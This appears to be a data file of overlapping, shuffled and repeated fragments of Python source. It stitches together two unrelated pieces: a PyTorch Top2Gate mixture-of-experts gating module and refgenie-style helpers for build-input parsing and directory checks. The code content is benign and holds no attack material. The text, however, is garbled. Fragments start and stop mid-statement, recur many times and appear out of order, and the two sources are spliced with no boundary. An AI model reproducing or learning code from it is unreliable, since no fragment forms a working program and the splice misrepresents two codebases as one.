"= torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type:",
"dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding",
"torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1)",
"= mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\",",
"- 1 # Update 2nd's location by accounting for locations of 1st locations2",
"locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity)",
"float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in",
"Create a mask for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/",
"= gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating",
"described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input)",
"l_aux = torch.mean(me * ce) # Remove locations outside capacity from mask mask1",
"= torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float",
"dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0)",
"mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float)",
"mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1,",
"probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s",
"gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 =",
"assert num_tokens % num_experts == 0 # Create a mask for 1st's expert",
"2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits +",
"indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for",
"torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return",
"Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 =",
"as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask =",
"for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits",
"gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity)",
"of model embedding dimension num_experts (ints): number of experts in model \"\"\" wg:",
"= F.softmax(logits, dim=1) # gates has shape of SE num_tokens = gates.shape[0] num_experts",
"# Create a mask for 2nd's expert per token using Gumbel-max trick #",
"# Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux =",
"code is licensed under the BSD license found in the # LICENSE file",
"value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts)",
"num_experts = gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens //",
"LICENSE file in the root directory of this source tree. # Implementation of",
"# Store the capacity location for each token locations1_s = torch.sum(locations1 * mask1,",
"locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce",
"keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux",
"+ gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\"))",
"token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask",
"inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple",
"\"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape of",
"combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float)",
"Callable, Dict, Tuple import torch from torch import Tensor import torch.nn.functional as F",
"* mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float()",
"Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s #",
"torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore",
"# Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s",
"= torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations outside capacity",
"Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts (ints): number",
"num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input:",
"torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0,",
"* ce) # Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity)",
"in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) ..",
"(c) Facebook, Inc. and its affiliates. All rights reserved. # # This source",
"token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1)",
"*= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location for",
"# # This source code is licensed under the BSD license found in",
"mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float",
"gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s",
"logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) #",
"if gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel",
"None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample",
"indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity",
"torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(),",
"return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described",
"F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec =",
"Store the capacity location for each token locations1_s = torch.sum(locations1 * mask1, dim=1)",
"__init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False)",
"per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a",
"torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations outside capacity from",
"= logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 =",
"mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per token",
"= torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: #",
"= torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting for locations",
"combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec",
"described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477",
"logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(),",
"of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity",
"min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1",
"# Create a mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1)",
"# Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import",
"locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting for",
"# Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2",
"torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec =",
"None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor,",
"= F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec",
"torch from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] =",
"logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1",
"= gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension",
"self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]:",
"gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args:",
"device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s =",
"dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 =",
"Inc. and its affiliates. All rights reserved. # # This source code is",
"licensed under the BSD license found in the # LICENSE file in the"
] |
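The shingles in the row above reconstruct fairscale's `Top2Gate` module (GShard-style top-2 mixture-of-experts gating). Below is a minimal sketch of the core gating math the fragments spell out, assuming only `torch`; the function name `top2_gating` is mine, and the gumbel noise and combine/dispatch einsums of the original are deliberately dropped, so this is an illustration of the technique, not the full implementation.

```python
from typing import Tuple
import torch
import torch.nn.functional as F

def top2_gating(logits: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
    """Simplified top-2 gating over logits of shape [num_tokens, num_experts]."""
    gates = F.softmax(logits, dim=1)
    num_tokens, num_experts = gates.shape
    capacity = 2 * num_tokens // num_experts          # capacity = 2S/E

    # 1st expert per token.
    indices1_s = torch.argmax(gates, dim=1)
    mask1 = F.one_hot(indices1_s, num_classes=num_experts)

    # Replace the top expert with -inf and argmax again for the 2nd choice.
    logits_except1 = logits.masked_fill(mask1.bool(), float("-inf"))
    indices2_s = torch.argmax(logits_except1, dim=1)
    mask2 = F.one_hot(indices2_s, num_classes=num_experts)

    # Running position of each token in its expert's capacity buffer;
    # 2nd-choice tokens queue behind all 1st-choice tokens.
    locations1 = torch.cumsum(mask1, dim=0) - 1
    locations2 = torch.cumsum(mask2, dim=0) - 1
    locations2 = locations2 + torch.sum(mask1, dim=0, keepdim=True)

    # Load-balancing auxiliary loss: mean gate prob x mean top-1 assignment.
    me = torch.mean(gates, dim=0)
    ce = torch.mean(mask1.float(), dim=0)
    l_aux = torch.mean(me * ce)

    # Drop tokens that overflow the capacity buffer.
    mask1 = mask1 * torch.lt(locations1, capacity)
    mask2 = mask2 * torch.lt(locations2, capacity)
    return l_aux, mask1, mask2

l_aux, m1, m2 = top2_gating(torch.randn(8, 4))  # 8 tokens, 4 experts
```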
[
"\"\"\" lst = [] for i in input or []: lst.extend(i) return (",
"other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if exception.errno !=",
"cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if exception.errno",
"x.split(\"=\")[1] for x in lst if \"=\" in x} if lst is not",
"user command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping",
"_raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe, when one is requested",
"def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in build for specific parents",
"input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which",
"parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted as follows: [[fasta=txt,",
"in a path if it does not exist. :param str path: Path to",
"and values \"\"\" lst = [] for i in input or []: lst.extend(i)",
"the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True",
"outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir),",
"exist. :param str path: Path to create. :raises Exception: if the path creation",
"specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user command line input,",
"os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if",
"Creates all directories in a path if it does not exist. :param str",
"...] input: user command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return",
"name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes:",
".exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in build",
"specification. Used in build for specific parents and input parsing. :param Iterable[Iterable[str], ...]",
"recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available",
"error with a code indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path)",
"the path creation attempt hits an error with a code indicating a cause",
"lst is not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and",
"test=txt], ...] :return dict: mapping of keys, which are input names and values",
"is requested :param str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError(",
"does not exist. :param str path: Path to create. :raises Exception: if the",
"in build for specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user",
"Iterable[Iterable[str], ...] input: user command line input, formatted as follows: [[fasta=txt, test=txt], ...]",
"recipe, when one is requested :param str recipe: recipe name :raise MissingRecipeError: always",
"to create. :raises Exception: if the path creation attempt hits an error with",
"input specification. Used in build for specific parents and input parsing. :param Iterable[Iterable[str],",
"recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read lock",
"result :param bool skip_arg: argument selected on the CLI :param str cfg: path",
"return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe,",
"input names and values \"\"\" lst = [] for i in input or",
"lst = [] for i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]:",
"the CLI :param str cfg: path to the confjg :return bool: decision --",
"\"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all",
"import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in build for",
"with a code indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path) except",
"attempt hits an error with a code indicating a cause other than pre-existence.",
"lst if \"=\" in x} if lst is not None else lst )",
"and set the default to the result :param bool skip_arg: argument selected on",
"[[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are input names and",
"strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe, when one",
"is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories in",
"_skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was not forced, check if",
"the result :param bool skip_arg: argument selected on the CLI :param str cfg:",
"import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\"",
"requested :param str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe",
"confjg :return bool: decision -- whether to skip the file lock for read",
"= outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return",
"MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{',",
"an error with a code indicating a cause other than pre-existence. \"\"\" try:",
"formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are",
"parents and input parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted",
"in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst",
"\".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def",
"default to the result :param bool skip_arg: argument selected on the CLI :param",
"follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are input names",
"whether to skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not",
"file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def",
"dict: mapping of keys, which are input names and values \"\"\" lst =",
"or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\"",
"x in lst if \"=\" in x} if lst is not None else",
"not forced, check if dir is writable and set the default to the",
"{x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in x} if lst is",
"names and values \"\"\" lst = [] for i in input or []:",
"i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in",
"f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was",
"for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\"",
"user input specification. Used in build for specific parents and input parsing. :param",
"cfg): \"\"\" If config read lock skip was not forced, check if dir",
"selected on the CLI :param str cfg: path to the confjg :return bool:",
"recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found.",
"the default to the result :param bool skip_arg: argument selected on the CLI",
"if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories in a",
"True def make_sure_path_exists(path): \"\"\" Creates all directories in a path if it does",
"to the confjg :return bool: decision -- whether to skip the file lock",
".asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input",
"else True def make_sure_path_exists(path): \"\"\" Creates all directories in a path if it",
"all directories in a path if it does not exist. :param str path:",
"code indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as",
"to skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg",
"command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of",
"and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir):",
"path if it does not exist. :param str path: Path to create. :raises",
"str path: Path to create. :raises Exception: if the path creation attempt hits",
"x} if lst is not None else lst ) def _single_folder_writeable(d): return os.access(d,",
"_writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists:",
"\"\"\" Raise an error for a missing recipe, when one is requested :param",
"an error for a missing recipe, when one is requested :param str recipe:",
"indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception:",
"os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\"",
"of keys, which are input names and values \"\"\" lst = [] for",
"not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If",
"on the CLI :param str cfg: path to the confjg :return bool: decision",
":param str path: Path to create. :raises Exception: if the path creation attempt",
"strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise",
"skip was not forced, check if dir is writable and set the default",
"return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories",
"missing recipe, when one is requested :param str recipe: recipe name :raise MissingRecipeError:",
"os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\"",
"read lock skip was not forced, check if dir is writable and set",
"a missing recipe, when one is requested :param str recipe: recipe name :raise",
") def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir",
":param str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}'",
"'{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\"",
"skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories in a path if",
"\"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" )",
"import errno import os from refgenconf import MissingRecipeError from ubiquerg import is_writable from",
"forced, check if dir is writable and set the default to the result",
"return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in x} if",
"MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing",
"If config read lock skip was not forced, check if dir is writable",
"\"=\" in x} if lst is not None else lst ) def _single_folder_writeable(d):",
"as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are input",
"_parse_user_build_input(input): \"\"\" Parse user input specification. Used in build for specific parents and",
"hits an error with a code indicating a cause other than pre-existence. \"\"\"",
"are input names and values \"\"\" lst = [] for i in input",
"not exist. :param str path: Path to create. :raises Exception: if the path",
"if it does not exist. :param str path: Path to create. :raises Exception:",
"set the default to the result :param bool skip_arg: argument selected on the",
"or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists)",
"mapping of keys, which are input names and values \"\"\" lst = []",
"import os from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import",
"skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else",
"cfg: path to the confjg :return bool: decision -- whether to skip the",
":return dict: mapping of keys, which are input names and values \"\"\" lst",
"path: Path to create. :raises Exception: if the path creation attempt hits an",
"\" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip",
"is writable and set the default to the result :param bool skip_arg: argument",
"[] for i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for",
"not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories in a path",
"None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def",
":param bool skip_arg: argument selected on the CLI :param str cfg: path to",
"input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if",
"lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path):",
"lock skip was not forced, check if dir is writable and set the",
"in x} if lst is not None else lst ) def _single_folder_writeable(d): return",
"raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def",
"MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError",
"_writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe, when",
"Raise an error for a missing recipe, when one is requested :param str",
"always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\"",
"import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification.",
"is not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d,",
"it does not exist. :param str path: Path to create. :raises Exception: if",
"bool: decision -- whether to skip the file lock for read \"\"\" return",
"strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for",
"Exception: if the path creation attempt hits an error with a code indicating",
"if the path creation attempt hits an error with a code indicating a",
"line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys,",
"import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import",
"in lst if \"=\" in x} if lst is not None else lst",
"keys, which are input names and values \"\"\" lst = [] for i",
"...] :return dict: mapping of keys, which are input names and values \"\"\"",
"config read lock skip was not forced, check if dir is writable and",
"lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in x}",
"for a missing recipe, when one is requested :param str recipe: recipe name",
"outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir)",
"\"\"\" If config read lock skip was not forced, check if dir is",
"path to the confjg :return bool: decision -- whether to skip the file",
"raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a",
"_single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir",
"creation attempt hits an error with a code indicating a cause other than",
"which are input names and values \"\"\" lst = [] for i in",
"argument selected on the CLI :param str cfg: path to the confjg :return",
":param str cfg: path to the confjg :return bool: decision -- whether to",
"than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST:",
"writable and set the default to the result :param bool skip_arg: argument selected",
"the confjg :return bool: decision -- whether to skip the file lock for",
"bool skip_arg: argument selected on the CLI :param str cfg: path to the",
"Parse user input specification. Used in build for specific parents and input parsing.",
"if dir is writable and set the default to the result :param bool",
"def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir =",
"CLI :param str cfg: path to the confjg :return bool: decision -- whether",
"a cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if",
"found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config",
"\"\"\" Parse user input specification. Used in build for specific parents and input",
"errno import os from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages",
"for specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user command line",
"return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or",
"def make_sure_path_exists(path): \"\"\" Creates all directories in a path if it does not",
"Used in build for specific parents and input parsing. :param Iterable[Iterable[str], ...] input:",
"if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe):",
"MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in build for specific",
"not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK)",
"when one is requested :param str recipe: recipe name :raise MissingRecipeError: always \"\"\"",
"lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False):",
"error for a missing recipe, when one is requested :param str recipe: recipe",
"'.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was not",
"make_sure_path_exists(path): \"\"\" Creates all directories in a path if it does not exist.",
"= [] for i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1]",
"MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg,",
"from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in",
"input parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted as follows:",
"one is requested :param str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise",
"str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not",
"skip_arg: argument selected on the CLI :param str cfg: path to the confjg",
"path creation attempt hits an error with a code indicating a cause other",
"return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise",
"and input parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted as",
